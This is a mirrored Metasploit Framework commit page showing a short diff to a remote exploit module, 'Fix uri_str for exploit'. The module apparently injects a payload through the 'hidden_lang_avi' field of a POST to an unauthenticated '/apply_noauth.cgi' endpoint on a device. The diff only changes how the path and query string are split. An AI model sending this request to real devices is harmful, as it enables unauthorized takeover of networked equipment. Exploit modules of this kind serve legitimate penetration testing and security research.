mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-05 14:57:30 +01:00
Fix uri_str for exploit
This commit is contained in:
parent
bee36ca90f
commit
231510051c
@ -174,11 +174,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
def send_req(timestamp)
|
||||
begin
|
||||
uri_str = (timestamp == nil ? \
|
||||
"/apply_noauth.cgi?/lang_check.html" : \
|
||||
"/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}")
|
||||
query_str = (timestamp == nil ? \
|
||||
'/lang_check.html' : \
|
||||
"/lang_check.html%20timestamp=#{timestamp.to_s}")
|
||||
res = send_request_raw({
|
||||
'uri' => uri_str,
|
||||
'uri' => '/apply_noauth.cgi',
|
||||
'query' => query_str,
|
||||
'method' => 'POST',
|
||||
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
|
||||
'data' => "submit_flag=select_language&hidden_lang_avi=#{get_payload}"
|
||||
|
Loading…
Reference in New Issue
Block a user